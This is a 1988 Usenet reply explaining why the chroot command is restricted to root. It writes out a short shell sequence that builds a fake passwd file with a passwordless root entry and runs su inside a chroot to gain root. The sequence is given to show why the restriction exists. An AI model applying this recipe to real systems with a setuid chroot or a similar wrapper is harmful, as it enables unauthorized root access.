Xref: utzoo news.admin:4108 news.sysadmin:1725 comp.mail.uucp:2389
Path: utzoo!utgpu!watmath!clyde!att!rutgers!mailrus!nrl-cmf!ames!vsi1!apple!epimass!jbuck
From: jbuck@epimass.EPI.COM (Joe Buck)
Newsgroups: news.admin,news.sysadmin,comp.mail.uucp
Subject: Re: Dangerous hole in Usenet!
Message-ID: <2683@epimass.EPI.COM>
Date: 29 Nov 88 20:01:39 GMT
References: <1971@van-bc.UUCP> <572@comdesign.CDI.COM> <5517@medusa.cs.purdue.edu> <561@redsox.UUCP> <215@twwells.uucp> <155@ecicrl.UUCP>
Reply-To: jbuck@epimass.EPI.COM (Joe Buck)
Organization: Entropic Processing, Inc., Cupertino, CA
Lines: 26

In article <155@ecicrl.UUCP> clewis@ecicrl.UUCP (Chris Lewis) writes:
>Secondly, can someone out there explain why chroot is privileged?  Or
>why /etc/chroot isn't setuid?  It seems pretty darn silly that some
>mechanism that can only be used for *reducing* access rights requires
>root permission. 

Picture this:

mkdir /tmp/etc /tmp/bin
cp /bin/sh /tmp/bin
echo "root::0:0:Root:/:/bin/sh" > /tmp/etc/passwd
/etc/chroot /tmp su

The final command runs the "su" command with a root of /tmp.  It uses
the dummy password file created by the echo command, which has no
password for root.

You are now root, and you can do another chroot to gain access to the
whole system.

This is why chroot is privileged!
-- 
- Joe Buck	jbuck@epimass.epi.com, or uunet!epimass.epi.com!jbuck,
		or jbuck%epimass.epi.com@uunet.uu.net for old Arpa sites